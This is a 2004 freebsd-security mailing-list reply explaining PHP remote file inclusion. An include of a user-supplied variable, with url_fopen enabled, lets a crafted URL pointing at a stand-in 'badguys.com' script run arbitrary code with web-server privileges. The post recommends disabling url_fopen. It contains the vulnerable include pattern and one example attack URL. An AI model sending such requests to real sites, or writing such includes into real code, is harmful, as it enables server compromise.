Date:      Wed, 11 Aug 2004 14:23:58 -0700
From:      "Gustavo A. Baratto" <gbaratto@superb.net>
To:        "Ryan Thompson" <ryan@sasknow.com>, <freebsd-security@freebsd.org>
Subject:   Re: FreeBSD-SA-04:13.linux in the wild

I think I may have seen such thing before as well... not a freebsd problem
though... It's php's own fault.
php comes with url_fopen enabled by default, so if someone write a
script.php with something like:
include ("$var");

One could call the
http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt

the text of malicious_script.php hosted remotely would be included in
scrip.php, and any arbitrary code would be executed with www privileges.

just disabling url_fopen in php.ini would prevent that.

If this is not what you have seen, please, I'd like to know more about it.

Thank you ;)